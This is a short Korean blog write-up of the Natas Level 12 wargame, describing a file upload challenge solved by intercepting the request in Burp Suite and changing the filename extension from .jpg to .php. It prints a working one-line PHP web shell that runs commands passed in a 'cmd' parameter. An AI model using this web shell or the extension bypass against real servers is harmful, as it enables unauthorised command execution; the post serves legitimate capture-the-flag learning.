Level 12 문제이다.

 

 

로그인 후, 문제를 확인해보면 파일을 업로드할 수 있는 페이지가 존재한다.

뭔가 파일 업로드 취약점일 것만 같은 기분..

 

 

임의의 jpg 파일을 업로드 시도하면, 파일 업로드 시 에러가 발생했다는 문구가 뜨게 된다. 

 

 

바로 php 파일 업로드를 시도해보자.

아래의 한줄 웹쉘을 이용하여 "test.php" 파일을 업로드 한다. 

<?php
	echo shell_exec($_GET['cmd']);
?>

 

 

업로드가 성공적으로 완료되었으며, 파일 경로 또한 알게 된다.

그렇지만 jpg 파일로 업로드가 되어 cmd 명령어를 입력할 수 없게 된다. 

 

 

php 업로드 시 요청 값을 Burp Suite로 확인해보면 실제 업로드 되는 filename 이 .jpg 로 설정된 것이 확인된다.

 

 

파일 확장자를 .php로 변경해준 후 업로드를 진행한다.

 

 

php 파일 확장자 업로드를 성공했다. 

 

 

해당 경로로 접근 후 , cmd 파라미터를 이용해 다음 레벨의 패스워드를 획득할 수 있다. 👏

 

 

'Penetration Testing > Natas' 카테고리의 다른 글

[Natas] Level14 write-up  (0) 2023.10.24
[Natas] Level13 write-up  (0) 2023.10.24
[Natas] Level11 write-up  (0) 2023.09.12
[Natas] Level10 write-up  (0) 2023.09.11
[Natas] Level9 write-up  (0) 2023.09.11

+ Recent posts